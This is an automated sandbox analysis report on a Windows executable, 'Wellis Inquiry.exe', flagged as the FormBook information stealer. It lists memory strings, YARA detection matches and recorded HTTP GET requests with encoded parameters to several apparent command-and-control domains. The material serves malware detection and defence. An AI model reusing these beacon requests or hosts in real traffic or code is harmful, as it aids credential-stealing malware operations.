          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com/
          Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comf
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comtal
          Source: Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comw.m
          Source: Wellis Inquiry.exe, 00000000.00000002.673404245.00000000081A0000.00000004.00020000.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comion
          Source: Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp, Wellis Inquiry.exe, 00000000.00000003.659071283.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
          Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
          Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y03
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-e
          Source: Wellis Inquiry.exe, 00000000.00000003.658754582.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/i
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ita
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
          Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
          Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
          Source: Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/tu
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com3
          Source: Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comd
          Source: Wellis Inquiry.exe, 00000000.00000003.656690322.000000000633A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com51
          Source: Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comy
          Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net
          Source: Wellis Inquiry.exe, 00000000.00000003.655882162.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net4?
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.neth?
          Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netiv
          Source: Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netrz
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 0000000B.00000002.923291558.0000000004D62000.00000004.00020000.sdmpString found in binary or memory: https://bitninja.io
          Source: unknownDNS traffic detected: queries for: www.marunouchi1.com
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.marunouchi1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.psychedeliccosmetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.aceserial.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=VDs0Hn8x6Kri7C1Uc2aKLXPFP0feJseWm2OJ8K++Wp+sqWdpvRON2LvjpBxhi0u2NedX&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ebookgratis.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.ovmfinacial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ag9v/?9rq=K9/CDnPG5wdyl4CHzmgShg3gLBJ4YNT1Y6jAhZ/FXp8/egWH1BEUOuCtjJEICRxztW+Z&BFQ=5jI0jhMHA0hx_ HTTP/1.1Host: www.dollpartyla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Wellis Inquiry.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Wellis Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.Wellis Inquiry.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Wellis Inquiry.exe.44b68c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 0_2_0176E9D0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 0_2_0176C9DC
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 0_2_0176E9C0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041C95D
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00401174
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041BA2C
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0041CBBB
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00408C7B
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00408C80
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00402D87
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BF900
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D4120
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128E824
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271002
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA830
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012820A8
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CB090
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E20A0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012828EC
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01282B28
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAB40
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EEBB0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127DBD2
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012703DA
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126FA2B
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012822AE
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01282D07
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B0D20
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01281D55
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012825DD
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CD5E0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C841F
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127D466
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01281FF1
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128DFCE
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D6E30
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127D616
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01282EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0479D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04794496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A25DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04702581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792D82
